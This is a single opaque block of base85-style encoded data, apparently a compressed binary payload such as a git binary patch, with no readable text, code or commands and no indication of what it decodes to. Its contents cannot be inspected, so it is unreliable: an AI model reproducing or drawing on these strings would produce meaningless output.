zR`7fq^zY#LUwHl<&yVo@7?02Q)T-6Kcdc5BX9J$I&Y!Q^>VIn04S2TUc^966`lnV6 z;lT^^O2LJe73Q5^>454Tk|Jt_N;yP+NO1z*3GY5SvRu&#-`|or#GmL z`Hk<~`0U30&G$FIt$9z&*_IEttZIE}>+wxbZ2J19CpQ1*=FoL-yzV!zTf60lTZXS6 zz5e0rm#%-!^?!7IYU`e@zkchE+Ya6K+S|Ty+risketXN#H}3rA&cnOjv&*^Tvv<7t z&i8b@uk+rn_jPUP-qHPv?)P-xw(pUB|GDqE{fh^_b>Lvn`+ItNS9(Vee(K=Y4&HI- z!l6(5zH%sX*9Y$U&%3^MxbDasj=t~cM~-ee)_*K_?EJCU9Q*dMpB#Ij@0a^N*>_9e z_XF$tFZ6%1{|Eh#1iu*E9ePD*bNIKy-wz)cc}E7Y2WGuw`iH&})Xi zH*|RTYs0zYmyWMFaqo$pBi|ieHx?c{HTKrAFOTu(TK)J}kAKa$*WC{PYbSgqU24C& zOZDL1>0$iJ_fhq8YDE3Kno>`yQ|i^~etZo%1)p;ocTzL>it$7ET5%rU=S6&V#T46TW_CmEg~H5`Qj2 z_%(rF7K*ODIm*1BeK53LsjW9K%_{?hPfOme4#sXiO!(*!=^s4Hl<$ud|3NqL&rK4( z;Q-T2Nt$0zGWMnWNC~}!_;{FU9zIMwGEVr!iPg6%b!V9H=kI+v;K!tdr+S!cll1pX zC*FRCQolR%TY&f8OnR?y@AQk`2g=*iEOYy0{w{p~LvnrPFgbZ3bs6`SH%R&q$9@C& zc#M>{ohE#_z?TYa+|HK#@(kgIDB(Ay<^9s~_nu~HpAk5kB)&iS6_jw#16PWr>5{!= zepgzeNBl3Poa^taAF(6&fQ<6lI9sC2dC3meTUnQGZDskokMBwBK$*Iay$dXD?t1bk zC^EKR+Hk`mQhra$zbd@#3z6~%Nx~;?ilT%yw-Eo%Hp1VKysK^^zEfbg@bGU$HXad4 zcQ zZvi^^4(TZHZv#5&pTTv!`vT~w?}F<-oO#_1{QD{j{9gba^{>!?__ahpNBx^R3H;vy z9rY}3pX1#TKnK5ub_)2903G!l^rsIeWe))V55?b`#uqn%{{+5ih!Jk9L;v~`z#Txy 
z4PJDG%mCtj8{EwIsa1e@-^P~)-U#TZ^|+<)Q%!()JJvT3d?TQv_WH8GI{+R0(%D16 zy8s>4ja&RawGYt22UZq=9{_YzkMBJ2UO-2^75C$P>Jp%%F8f{vc!%>SD7yjio-RIO z>r;CG9o6nE1K$his1D~bws4F+fN4Id1?S0CZHp^CsXyKu3j~Hv|%=svu&`}xZ*3jBkB4&F`qH{c%y zbkxV3XMukl(82pEKLq{>Ku4`O&jEi1&{4nV{0Hz)0y?fs2Hb!z4@7($aGpMe zcX|E{_!ek0d`%L1ECTo?;9H@)B7lDd{6)}L5x~C%egkw=1n_IXZ-ico0R98;ZO}y# zz;6M+3Hm1j_#NQep>raD{{nmm^hpHpN5F5xNqPkEMfi&4?Kn@50NwWSXyvuYQ@O#zuz)z`LfS*#g0gtI1@R%w9pH}C9Ppb>SXVm+F z&!`UopH=?@_^kRJ;AhlFfSOXW1rITmOyv@6^Az@%4?jum05P=$enN z{fl+4S^sF$o0~q`^e0V!)AZw}O&hjtSlaO9hR<#2-PphJ?v1~{@lQ8yXuhubcbmV} z{IAVxS{`kEXY1!$7dBno^u|r!-}K9yKX6_DmZ>fAEz4WpzvYu#-njL#TR(8?r*8k_ z+rM!8U)}!A+gI%z+8Nn3e#cAic;=43*?se!x3wQ?zq>uwzSRET+CS8;_P%Iu_uk0f zNA|vR@0a%e>)s6=w|5-wnCvKYyryGg*Ve8p-QVv1#eEz1|HA%l2X-HL$AOgtBR%on z2YWB{&L8~wgI_uL_CxPJ^r1t~9m1jAT`#_C*Ii$_>+kNGJG^-KHHUxo@H-Cw>EY8y z@<(2A2wn^?hqD8h20l2@F&G{E>d^Rb z)A4P`M~=sjKYIK#$L}9WjVz9Qd#n$m(HiloKHsuB*ohU!_bT7C-=FPrdJoUJDr{%faB z{(jZz=w|ruoVR58_o@>``jD@|zjcUq!fOA)PX2w`zq=FPtnmG{f6Y(>!e15oV=Zgd zhx~O*eE-n<-}~`Bi#iVhmdlL{uJh2=s3E)!U7D^{z5J!+G@p7Jy9`tb-Dv;2QT_fb z@zOdT8!V@_s{8TIwoYeTc&qv%-r(k&lntMbGN+JC?Cw6KG@d>U|09x>BVyp&s_??w}s~jo}+k<;pxK@z|)T>h$n<6jAsDPkQ#)AJgAQ2 z8Br%-6`xRJcp`Yl@!XAP0#6jrl$uoc;5musUOe~Vc?q6VcpiX%;H7wCc&723hP9hg zNxa9JRI_-_;CT?fgR^+%@MP4y%HmnT^AMiA%HfT}9J~oRcoWX43wR#J8<{Tyd=xj} zUZGyDmhdd&c_p656uxJzeg%D=fo@%a_4Wn-H&w9ypYS}ZK2YD_Tem9c`(8uZ_XT_h z`V0Q7?`@5XzWUXV`g&GB?)&`e*Z5Aad5!NXp1!rO^L=V<*0+6K)^}mun|)W;z1{bw z^&dx`Py611-v<8{p4&Ej*Z2Aj&-wmh!)j-G<7(&ic>Z$Z4rg2Q4reER%X9?KLUXtC z<>tGbA2%=hnp+xt2U>=mhg;4%Z)?rs$>Rz7{F{QlotvI=CO5sq`PEHNJ3rd=LFd13 z{-N{gEkAMIwdGm$u`TufFZkE{w_M-p_isJr|M;yjf9Gwd{6n`j_g6sBg<1G5?qEcq_^X`hx92-+X($|JCi!s<*d) z!v7uoP40cG|J>eZ)f@MI!vDeXG} z_5A{#w{@NJf1<0wcSm>3|BKy0-w*Jt-gg#xPx<%lJ5l$ReKG&R18CQQZs*+xX6xR6 z;F}nWf5J0c_xS^-{69EwzV0PG=j%S*6Z8LE?_2#(^`?DK^`6BO^S`zC@w)Hf*>tem zSv>f7-NOePeE)=}`%ut#;&4NK{P45tO^1WNFX8#Y;Yj_jABp0@J1a*{`9E{?S#|K( zS>MrP4Zb(xY3z&nKhlRW$FnW~{@}SkaLWIMz?iwSp{)vGG-)|2FecOi`e4Rr<-+S?VZ0PIt@7fad{XJ+u9QuBJY&ht< 
z^LP+1D6C)gt}V^0zIVKN)sK%i_*zc{eP>UoliA$ad?8*)XEVc@nQUiAhdO-pU@X=f z>jX9)&*f7i>CD+wGIILCRHAV7w26v_qtW5WSZsJ~ARh7QiYRj*I86W^>7Z*6f!(ZZ5t6^$a!elJvqrdQL0QE|ehB-w^{=Rk@iIlE77CprReuP-7-rC(D)2 z*VI2IWfxP{QX3{scd;~&(0a#G5}4_%E3TZ*rmO=jtGbLy6iex0n#!3Y)13NK=ZGv~5rQ_(Z=+`C9{iad;vXhr*k?SV9#Wgr$w93TLv({>AiMGL=Iaqy^5$(^y(r zzMcA6hKAz#GtpE5m}u%8Cgb89gT*>Vpk@$eAp>!0{fh{V#2@CL;X-O2d_6iJi$M-y z#$03wVh1tmsx3!|icG;qDWGGE>HL{gQqTIqMWYqER3LdSzL4(jQlsfaE}PHJ6xvUw zGYAi73V?RX1FJgaO^S{f5O>NWaP28?vUM`swWqvE*~668rWeR1)61mqW%?RxB4W;@ zE>JN-O(HNuj*>AZoXO_q<8v_cl0(^iA>&5m^*TbkQ8cE`e!kSy^~7Y1t;r!ZWfw3# zGX_s;Q%;wX$YwHH7)|Wy#hDo_7CJVcisuq%ior#!z$PYPZ8?*WYoA8riMaq~b1_sz zVMfC!H1wP{V3M@PEe+Bq%cU+SyWkB8v&^FG76DN<0mCB-v!Tqo+QdUWo4RP?W&Ax# znwABW1qQ|}Slal*dg(Fe5vw&%r6$yQ&GK3_9W|Ber%S7!E_Dz2Fu4f3e;VR0rU2#% z@X1^}lb?YUXw}iBPNXhM;_-Mo$F!lea43!`+U3znC1g%nwDM?AEOtH@Um)tvUWWAS z?XD@Norp3VsF=c{uMscnS4Rw3)!AuMNP=rmNRzUYMO}MBB0tRH=L-mtLR^tqCHH z`LS$L&j92#5-Y-wphw&hienNc3aR3Lz@{p2%aTe?W&?|bGvqz@Q#KMsSX573vkfy% zD4Qav1?Fq&f{8T~15~R|fnrF!rYfyr2s9#$n9D@h6d66wbSm0BI+`<}ThD-Q?+oZx zuGP>j>kUe`!pn-PZP`2b)fUmBS+P&i_B*go&87;m@m%^GmU1W%tZ&>(gFczXT7$p6 z2fG4YJ)v+<*FZ-{PoSe?e}8wNE7;M$Z=k>T;KAS036+2uc`i zwptfNBQArZ(EtSq6w1RsuOMJNDBCde@)L=DA_+`p)EH2slfVt^93XAQ&BOlUzyPZ{ zFrb$VjLFd(15#sP5EDQEPm=a}! zVmX4YngM~vT->M+Tdij)(lxofE*%(TkiC|vY$2PIMG<5(5TQVDgae@|UTYi_%k%v( zb7Pa?dnaR4W5dBnC>#q!gTup}2P)_j;d{apQ8(ULOc<)-AmJ?3%pPD>2g#)9jRC1K zD2Op;xNQE}J&vQ>uyQE8K;RM{f}o*JkH(QPJ)(SL}mvf~1)5MdbuG?Wdc;D93! 
zyLxojdSgIpG#oKjhJYGH%pHxj@`OrTE0l%f0{sHPU1<==rDx9+M&kuoV>0(Z@|a5q z&1;8+$y;W!qM1k{je{S=wOzzTi5S~6pqN=&5UEh;wZkZ~o1ML)NT((TdToD!)aWl_ ztXg4q^aqq&5rf3}qylE@|0GqpUiC9Yykx17?YRdA}f`Wz&aETe$bU=(6>mkgT_rmh%(!l7e{T?9!+ zoP`t}&y#Q)vmYSdy_kZoHJfRKZ3}^p!dnH+WtMd2msN0>KIeICX2t6nO2Iz_g|2Mr zP|_+qF%g-FjYcNIu~1+#pi1RQg`%;@*vNgckx*bfHWm(t!Xc9-5DdbV9t(xXhCxHR z6QN*iB7FDM@PrPJmxV)!2u?;O?u)_eaL;fsT$1|a#PDRGf25Q+JYJG!Feq8!v+&k4 zIXoI>i6z9!%El+c1L&-7+h8OTiWM`uQBW1MAoS7~9S*5{IRTQTt&LH=W+RPe;aDWr zKM^@ej|y7@H5nU-OpOU^Cc=|b6Js&>e_~^S(J;9Mjq44X6ayoHNpBK2Jce3gp{ena z;b34g932Wwge$ajba-$qfSM{}tloB0NO}E%Xjq|}QYF1XrZ2-|_XI{j9twJLU^BjG@(|31W`OM!bL$P*2Z3@E#fL?P#Yso7%VOj|8JRdyk>6H08i-a#jz!#+t!e_xo~n_|E$d-SqCE?18Mj8T zIF2aI*r|bm$w(wR8Wf+st*!s_;Q_0Yn*CK8|9*uwi(_sOwU$qd5 zj0T3sV!_DRNZjhoY+3 zUtMoxVl*(RB2$#-{y^}=-~{Ke=s=PNA`_ywLc`Hu1athpqGV3S!ef!C!J*h_7|OIr z*Ww!MpNih6#4QqwVLzWQEau|sJdX)O*c2!#bKA*_u z=78YD#R`J!H_W#Wrr`WfClq~(;zAT`GK=kl4n|WJt9GQKXanekn1WnU!x>iUG#kB>f%b@n3j>a?CG9)L@VCS72PNLCsu~-^soay*nk;qvw zl}Y0a5h=781caq%%Nqe|;9`I=R0@V}&=`#ilh3a6CWR*$vxW+yFa_gz{N<4f*`=^X z;`}%7#o2BwhX9k{LQ*$tI3G4!H))tBn9c_Z1*{3FBxW&B1aS-kcU~x!!Ca@aGnJzg z88|xuD*)^S4LgN!hK^|6(`t0sygC6hjw8bWmT{Bb6C6feaGoJT*B{N!r$*xo3npba zlZT#&(nTY3b5dP4jP==5_l!hDGgl&$oY@tYtCzG+T z9Omd=S^Q+Wa7OH)q#}weCX~>k-=0q7DdGu=xM0{OL9*KylBe4_Oz`I9(JGtV{!Px! 
zRg11wT8-p+twUux7U-R8uaOWfnU80ZJQ%N)B$GN{!1j+`?FaMOOs!<5O1&M=*GiSl zK)r{?u>=4rOd_?aXn*oYTX3Hylgn z2jXz?7Lx|!nM4X_H*^deuLI&-Wv35DjPajT;Y=cTaRJ#UQx^*3=aT{L$xvpsbo1rg zqYJ47G!UKdDtw`k!`^Blty`#1a~NX#+|Xc^jgm}aokVX9FmXNET$=D$ABeg{t?8Hr zWrJ(;*$e|Xe8Ne;hfuz|ky>G&VzOS8Ev>D!oW@!?8r<>NG~O_(C7H=|Cu|}&RIo?g zW=mjBb(zq#6X;}iNDev_E~ymg(2gORbe#9%s1STkD(nVT9uF(yxsb3)kjXPC`HSI_ zzi1V7XfAyk&E|q5M9nopYaTVJ*ena?wx?*iA3Yn3^~V!usV~#1ImEiAQDvN6VJc%> z6<-;Lo|bFz%0#Y;u8i|ew#rz~6se5VBL!)#6;%|s$^>QNQklRbE0vK&8L5n-A!8Sc z%GhWscPXJ83o##hD!xuVvNHZlfnCJ8I^k7c9rbG0IEFKO6RW`&WGEflK7 zz)G0I=8eWnWwuHWRYi9-1NHb+FC+pzfO#X=%&Mm_Ru(Ow8VStwuO2%=FH`lXXnfvt zgQIE(c_poSW*G+ZGgFm0uw-jTQh3;(>RH9XSiwpxGu0!Cs-Swbp6}J;^l@PII6ZVV z;^@|{9u<}2RXPqT`FT$&cRE`w!mMJG^gzmrU72?{FGq@L4b8E4ZAaAv;wRWC-bNZJ$MGUmm-T*Vzj2HWNBz|9?lPAyvkO(GR<%vmxz+t z^Hqv1s!h!J%8a`GmGt4f(So%SXcZ1==2esmF$nU;VkK5-G`TELEw=;^Me1T#U?E0yi|) zG?kRa0AorlSBWmA=pA`U7Onpa7bjA z5b|K^kY`v0B@7z@yJC3R=xtHBOBq;5_siX{fm}*=cNEFttW)#mFSsrq!lIi9?Z5!@ zO$lt86B@}$kPb5Gm~8vZ86IszO+4oEh3wXw^1%?p5K{FrE?}AzEXpe zIpPpLiA$)4rfZI!(M^k@$7rFJZpx(0C#%kdz}Z+rAgi+Ms&>rXQ@l1OdF?(-hNBqZ zwWw?^{jhcs;qX&w8%ld!CrF?aoTCpDrXAFpCq}w4K1_L(Dm)uHsl^*+T1m)e3lhqM zeW64#cg2oR%BZ9w*MzwYSs7_!DkGBRw`&!gR+&8fE&8&p$QpOaLGfS~gNei$A;%W1Z$^SMn684% zE$C5~fc9?+ihM;im~_<#9GK?rtcS)%>SfzQfaEmT%8xz$=JsR@pXP5|+~>ooBbM6L|?**+}(zY6_|aUeH)p-f|Os5Etf) zf^E0?Qf6_}uck5yJx;}xo-Mzm^@iENQm=p{DI-CK@K%pEUo7sv3Bt7fQxb-Qu?#E3Rh%?lpi4-A z^@+BpoSW!!ik(Eo3?AQww8|(l8POwZvxUL9# z1{^W8LJTK^a`>j^P&&;+6-(%YHqKokp!W%^7P*3iOozEn*v_Z1cEp4L_Tzqxq88_0 z=sVue7TbX*9)b%;E%h{Gheh>sLBhe3+*njmIFh~Lyf-k0D^5tk+fLC0wr)5B?2g57 ziV2jA;u0hb5=6_7aUN4ZENV2EN3y)H6-i0P4J3tGTrVT6f_0VngCt!kg@+*7M0QS^ z!VIVm){vR}LUrYx!AZHI&vtTni`iVql2qaemTMDZ+7@%_=`2C&E>DonDIS)1=z7vi z4#Oj`EKs~Nsd+4J{9>tEBT7)~KOIwa`ALxV$#%}oW?fsVxSWzRuq!2roLvi6Aip`Q zcyJ8?!wFDvT@PaVtMNh(qgTi+CU6E06$^!s%U*N|tlKEaAa+_zlQ4gS@dXJlaN{eT zbKPpfY)_C9UHV=Poo_}M!7RD62?H#Xm$nxv#qJd;Y>;u$NhKB+bIO`59!svBx(b#S zPmSf&6K}vIBe|&soYGmlNXx9fZfo6pQhaguTBII6+KEZSc?E9q6izIBL1c<5>kbe) 
zSf8`In`H4cMe+Q^4TVyt7iVW_wYoG|WcQ@=v^-s!)v%Lk_`$toyd&+M_HNWL+(f+1 zT0NHTr{P)Lw=XG7YjGG9$rKK@&bozZVI9apfAbv}H$t~Rl^aSY;WBgSIM7RFxbbmG zwhNR=3|;j|$ns2j*0>JcyxKN!!?r94t=#!9sfc|;IZ)nUftyEO{|M__cw^`YZwcrV zE;TS0pY;T35@Rc&k38q%7X|&*@cU8m9$zE_86IqZbVV& zU6R>huua^Kr03EFPX_kYuC;ESc(G?3{lz?XNqqfQ-&P2vlQ?@0U%+i8NO1o}BgS$- zDXB3J7gGv1K>%gWaTlPMbaQ{`|1Fu8knH*bCS>cn1`?ffX$e3-Q-fZ z*KaP<<&H=rZun2b1Ij})fKPR>%zF@f+2x{O+)>;yqF*N8HEI3qvpX3DYb z$t+dyfql^RIyjQe%+gdT5~A4AiSbfO2|@K4idhn51z{l=brTa^Je}7CvuCn($i?U2 zv&b_Y6fy4|f!A0|XeZG>Vz_|Oo`>i%DE7(hT=q0_;!ed}c2*%a3|mJ*%=yRo(ZUN^ z1k7}w%)+^HL6eG8Nv}m}I4@VZ%`Vf0-Px$smv@==hI1px%(hP7>!>@&o9oK z5c9xyhie9g0G}Q_u51AfOpTsrm?@3tRK&vKbj#u92K5bSewnQ7I{Yw*BxPso`qi_o6iddDLyN;^N>oa7DU=-SShQJ{xk!u zWwRa7x=GT~|1~ry!!7<7c)7B0lf~!2YbWG1=1P&I{f@RfWG77dOo9HyIZh@F84&LddL(s@6j;N8%n9Ui!?{#o zP8f-Myxm>AqC~FBE5Q=Tcmr|svarPDd9&4I$;an;Ka9Ec1eweR^XG!NBV-$iIZ?dW zF5he6j#F=PF$~(crxe(?V8^prc7<;>Q7Hh5O^7+o6E^e&m179)TA$5P`?|5*)M)#_ z?h$N5Y|i$Q9Yjf0Smp9`5K2u&m0<}+KjDHeFaJYw;z{%w?=Q-2M1u~d@RCR-J%fTM zT6{^}#EA8+)8j%QT{I>F8&>V5m#bRKPzO_)dqS)WN-30@#Vn1?SfPX7l`IgQpj&P(Wr9HrtJB`X>1D#Hrc z;1I{u47vans*a2IUh6CR@!8o5=e~m9er7&?VGi*@&qqI?j?x*)tM`!72!moLm51$M zLT1ZsLtth!1Ofx3gNufCdRgbiIBW#aU+UW7Ys+*sXTKuH?kO1u3nMcEGDjY zT#scZ2Pe%=j|pVgol25P`p$=ks9yyxjnYSJUO`fsR4SP-p(LRru$FUU!SRQTm?H_H zRDR|}$<;!Ah5}*1evUcGbB?mTVIiz2AsFLCFQ}%2m0gyCbm3BjK|OU^=D~DY*i;EO1BXSVMyKOQaW0gRn2Lf3uYpYg zDaQM&SRKmgS#EJqOxf{?n9vfTyQUXEuJ~RvK+&+$(wD;J@%4XxU0mSnsa|Rz zH;Xf?OaTi}WCkn9Y|71HMAh9f`GG{Z{^PuaivBe9E|W5*}-eOmMGLNrWe8)^?eRdiTulc(K9dq$rkbZrZs@=L_+9T^rSx zlqm?eVs?ZiKi{!(H!U{mB#h1z98H~OE}n_a@(UzZZDAB2f>ly{FMvYSF2o=Vg&bCP z0Q0VnZZw$(MdbPbWKU1m2qoNbIVWE^CrKWM4HTbUrM&-fcbopvDlQFFzLM$q1Y({YscnZ+x z*VbJ1MC8rBz(X=`y@by}mFY9_oShCOG|IA`NUk{~Ev+EpGE&-@be^QlUwO$-N~l6M zGu@LvmRrnF{&Py)$=Dc6K!io_0W`r{2ksZ;$p6TByj=z-&J=F;K!_nR1^KeqNql>T zlyT?{ND4hGmc-A}Fv@B@nB?3%^3NgxYLd&qPTB+;D~lVKJ&W@;VkS0yo-gKx6RG7YM@$ zJ{Y2P3JTEuY9Z(C@So~ZXHVMMw-g1MU zZ=G2^>l$0dS0CGLGHgE&8*{WcyV*^=eULAD1Mo7C$6OR6?I>QNEPf~ytuSSHtMXJ) 
zmRL6#E)shPqS|@!1W^8r!neerRVwZtm|70!Vz?Jq;2(srt}84F)}g`8Ebda@UEzKJmr->ki%Ar9zv0!k`0dRsx;l07fBX8s&}xFT3Ge@MbV*q~{eXI<}VrxNfrqxHYHD^i3^K+P@U%~0dDVk(#Xcv6BbQ z7|Je0KnI{X#JTGlaaFPxNg5&B#C@PA9ghQXdDk8Ya^*C!=%vA!MGkq@R6L=PlFPW7 zWQ}g}S5uge-Qe~ddoWF$;c2lkpP-BBx63Q9>50v)u#m?LVs{Dwe)vp5usGuvaA=gr zIoG~etZ*i+M}XT--6afBslU8*^(iYm8A%73tBav3RACB@+%8 zeWiz~6kl-mp1y$J_-yQ4vG)}k(lsqawAm#1jPh__@j6V!7ah3k_4)_fwH;e5-wr}M zKL4JcFC7MQr#ReNUl~&o?~7&f__zeGm0^oy_5mCTVUQW~qVLm;yeBMb%zQt#=mUk0 zH+N+`BnqnWc6$!S4nojy5;n$ zZH`}{Hn2r>4|^?H-!(vCB?pN%))Fc5mgeb>B~j^{PFWJgL#$O4ZE5HLPV4n|OyPkQ zlb!0!cu_c+^Z2R=jT>!#Yl?`k>$vbnxgyEwifeNVQU;qSxwz)?4v-1Rn3cFI^f=Sm zpfOX8=w^!#(iE}N$V0?9Rnq76cgISU0lFdI|Ik&ytycBLCaJS#BpOj}SQdw0Hlz@9 zeczqiI9%cJFxFCJddUZ=yW2TrX430saq-pSsWHtsjgz1D{*;@pl)^N{cdDc>ZisP} zFIDLUP~Opkm0x_<$|wcBanmib>QT3pO90IS(tCq%AoRTA{+*BW=i=M*VdN}4dQ4@UoFM(O4{LZvu5j7 z>GiwfdbBr<`=*%i!V|>(0d%c6!VtA~?LanNF1@rbSC-LF8daE2aEF>T5KEf)j-ivq z11v2Q^{yFfP?>{x2|#u3D%hMejyr58c_M`GeP9se%!Hd@i}vG(6nF)XrzG%f^Uw>3S!XbaIGwgb z=Po5MrBqQmwGfGb3cvIQ75QLb8i%VP>7gp6aYs=08lilF-eeIO)~8*DQqVPN@wW|i zo0c!SGcfD1MxuN@ii-ujL(NcjA%-<`E}clD6Zi|xTmUHDU+3v&EkF0CA=xcE~-*@Vn)OJxxJE_Z_IQ(GL~O3ZN4sM7J%MUn!fZ)sRj-D}F{{Su(-hf2KpdPBkhfb! 
z_B3Xvk=B5kW~(tF{9qAWo>;f7&q}YlT$O~X#YV0~S<)mwjf?Lw$!{@OqJH1UhDI}a z>>O~v*OUTzCGT+^zb5(L~=0rCa-Wz5V_4E7~{l~VB?DcNyGiIq+4J-Hko=f zpwv-`d`v5yF#&g&4FN-j3##%3FD4ds=q1p)FkWSQE@{h?;PRFUPK#D=%*5izkft+=MC5th!XLZQ|^r!A5bJZ4CPrJCnF~ z!I$HppY$CGjDLZo;=a%lvWxJQ;bG}%tz1pic)$Mkx zQhG-*e1YqhY&>BWzK{o2H&fIk=_bl3j=U8V#@S=PuGFtjE5&KCb7@pACtDe%A0-HaA{j2unz znmw8#2D?Uw$El|cc@Y!(f(fLgGzfzAZ^@q03Y4^)p9;xOATiVa7vlEH^F zIQP?`V*j)?Y`sC{7jueq?IqGaO%!ZorWiJs-|$R$egVV0Ke~g62Bme&+6irT}Kg< zz^}As(eo^R-?ac*5aEmXEmv6a__fy@>RbRHFY+gRw~U&$vpl>ji~f?MYHbu;@5Ixg z)CL!qa51ja6KB#Ew11uZM1 zps!^Vw62VT_LWh}TiC@GZuYjh7Zj0#tzK$3c*j2NBadptphY!ez{eUfXmgDiw7o_Q z`cO4yKl@T623)TZ1Mb&|snyf{;6trEwR*~5iLRBWR!{kh($(`EsM*s4oJ&>vbAZxc zBc@gh4%BQx59dzR(t2u22!AKLR-RgX>#51N9{lEZtLPUJ z8EDNMv|@o8bNv`Xr|~2i+I~{v=0ty2N!=XADwPuLn-%@4wo~U*m)9tNtsAdy2qG=+ z*aFU>6un-|3QgTiot{ED)akkEZAJdlG!guEH?@3DvFy^gL4>*5Ehx3CJkHJ6hF=X>UG^OuAV8SS_4SOc3qTTLSJM{*NzL1 zE^y@U3Kz>+05y$xj!+1B=25b>I9LLIH=QHMF~n6HNEpjuiUc68iXujHYYywRy506X zC3)E%Yu~iNE@C}W%JvChxVs=_u_xM!pv=&sP`f83<-FA7)?vr4q^wSs#b119DcZWK z_$ zbh}vtduZjHqu}AedfF?R3y9e=j(X2auS7q|EZRrA zmVMx8wPBXx)}_Jwfu+%2%B1wRdt9&?$-%k8vM6<FV^o#8!qRf zolk6GxrBN-*aqvjr~{8Z-|QJdS!_4;Gh6SKAB@IsY9u>5PlE@XPqgxbkiOB<7Pk&# zKND3kz$yHlz@zq32Uptcth1_Y-K&6~z8%ZxUpQs<$*OhOW~s9m?RjAMIjO72K9cxKVsc|6rq4+(cz z%N}(P+H_5wF<9D0&L)sAfJj&4=rPjq7y-ml&ArG!*qlH4vrdnyq?1v53fjvq$Y$Vt< zTfFrKF(czBoqEHqkNQ(xvw}Np?1(2+X3n!@T?c{2a#hJ{#BO@&L_?#wIzvh%A>pV4-|kK z`UcIoJz!ubM+82Ghqa`2_X|5{RSY4Q_J>fzkVTvidC=xiRvv9KdHgYy@E|ChXR5(a zTf5MH_KAJjC%sV>H0*;~DY;BZxjl&XU}sW6>#mS;*^QJ*K1(T;e0PM@`gU~(yd!(j z?mLv~p)~FRmlE=qdXuAfUWDQTur$U^ufJM*q%}vkTT#(*czY4~J(kYWb34@|82W2X z*dyp-Icq2`KV6<45wUCMsbuZ**HfOSTk6qfFDE(|Dp!e6ogD!~MHtsp=&bTm+pd*I zExkq0C)`1SmMEPelc<6dlCtjAY#eiTUO}fj^5lD->T(Im)m8!KpH@=j# zBOY11_JYOIW<()#N?MsLSJ>sHzmP>vWP2A)2&(f06d+AYF27ts^0G>CnbxK(l`f47 zn*MR5DJtF7MQm4jtK4Ozlt1c~tG!|vM^%;U|NkG=$+gv1`K7p^-N0)k%wr7Dd=!tu{;}#(0Zvt)y`mK;=v;fHnYZ%FVQalg2dC zq6<&Qt=48KN$tSB6Nf)(w`;f4LO+At>?PZ<$9T!eRk4FwSrYlg9*_d-yVK22E1F|Q4@MGu=qyZ5 
znxgnd8A|2;ku-HTb8t_!2Ww<`j(~6=g0lOOo~@xzDI$+Ha`EbyC@GGeR#|GfS*sLk z-v9I3*AA)H$2-xv+U)(W)!C&ww)Pr?skNT1;#Md_F8ACI!R4@E&i${4WwUj*< zFmFRF%PJQ&bym0VXVaqGk+^fS)*Q5hq3S6v$`3X*=vq}hTS^F;AGWmr7Ci9e?Xado zsqSz^Ky9zh3!0Fs+j^Gho5Dv8Al2UG*81dJPb%ir+78T&Ahu}(u>DKR*BTDH%wRQ9 zuQd)e%D7oC>zqfl`ni+m&Wf|w_E06RT@QT_)I8cdRJzoYccs0hcD7z&dh0lD=u3S9 z^{Jj=K+b6G38$w^w~O0kY684Q?AgJ!iB7>7t!{%%i?=p!cXe&3nbtPBs_UWW>b#VG z2C2EDWqxj$OZ|o1cvEZ5AXe`RZ5ybU>CtRMTUY`;QadoU-bu$nyy()@$=FS@BnRcr z0=PG~3i@_rWW}!4Sh?HhVv#`(tx_){y|+UQlTmJ$v`2uo?7=^8+4Lm{k_blOgI^`pS7PVWGGyu@XVP(G%vT7zf3>;;?Zuh-V!x_b6AC2ac9^1=)dy zy^7w606ZSnl}nE4!wo&OlaiS|_WD%Fx1b0t7h_v3u8E-P+rfKQ#s=7-b~#Qz3`^!1 zT>#vnR6dF_X!CNT%<0euzG)|c4Re8{(@~G48(%3#6cRFpHP1;)xM*|S?DEV>rtUt8 zcrEg}MmoGWD6EI=qeHDtTxZ(d%pPfjN4r5w+X>Z?aC^ZTC?UEAUCK|}dbWb56&G|270&dWDC_~RwP^Q@o7eJ`dkw8}INfxc^&Db9DJtY4M_vV@ z_)9fl6_$4dZZ2Lw(W$i?$f|~yVdBCm6fEbrZdE16HMe<@M$3m=lbUilZ2REySdY1t zn`_Ah%hfI!k%Uv0r?yP0EviGSkavIsHjU;I)fYKLp6~#Umt`!U8Dq_3{HU`?W4ZdQ zHFiOiR66Fx5xAMH7(#uVC6wktjE269quad$>iAB~WpRWKx>t!f7dbArcTqFy)N@ov zEQ6YgW@o8x#JERFRf#oSIrqn~e0a;c)6m$5>IXt_&dQ>$rH(bz13L&c$G_S{P+P53 zGMq&A_8O3$4=bSl=9BkJaBr809X?A6R#GId>CD5=97kpUzw96CyO}5c6lr{YSlYoQU%MRb zd8N8xC(bc;t7B;2{YZ5O6cH)1iwfMYPI*qZwZK@nJeNosZujFxtj)0##n%O|NzH?-2;Jd%Mxz3FNs|^%&kc+l6!Qm>4{6d(h*%cUCQn_Y13+^?bFc+bi3) z6aC|D#)Ihj%W&rOD0>>$%34n%o`u~Bg`kzRrZJtS?E|K1`-`*#MOsgh)?1_<1g6$g zy6rSq>n9;wlvA2~s?{5cVq9S6ZuZjba#xyiLZ{qceZNh|bnVj<<;Ur8f;We`YaYTv zK34N4ajD{HL&`}=3760W@^C-Q`^JN!#wLv!)D9|*3AOot^z(k;j{xQbV&B@#CCrXJ zJymM7vMu_C%#27qcfj-_=A|a9n9D=$Fc9Z4Yt)9l9?6FaY}UJWtIELNwI21pnKjXD z=KSIqu^zRa=0kDB{EH}MR?=}vFrx(To^8t*MwDJjwT%mkHU0y@cuvmcT<&9RuZ(qD zf?BtEIg`gZr8le^0$7qm@WD_cpckvHe5;^aN*hL{`W9o4NVUFkZjJrDMM+n?2GPm_ z#+T4tPTi7uQq0_HHShiMmXg{qiI%Y6Tq+^UxKpV)kb?@cq!9?#s}{ZoW)fdQ*~byBn`HM<=X%PX}#fR;t@+=tdi z5FZ6+Mt}_pRr&i+3KwS@g4}5FV2WJwnpi5UH(Uj9!Mlm$R>Qq9KvT1Pv(g4VyW5zN zyAV&OgudfsHvn26QIGc{W&$&JRH>K!SJY>9-7d%*+g7b^YQVC(ALV>XKn`i(@NQ=s z_g>CI-sd5IoKFvl%##=AV2bb#<-=$-jgAmxbO4;C<~goTfRCfX{c&|SdPYf^!VRC3 
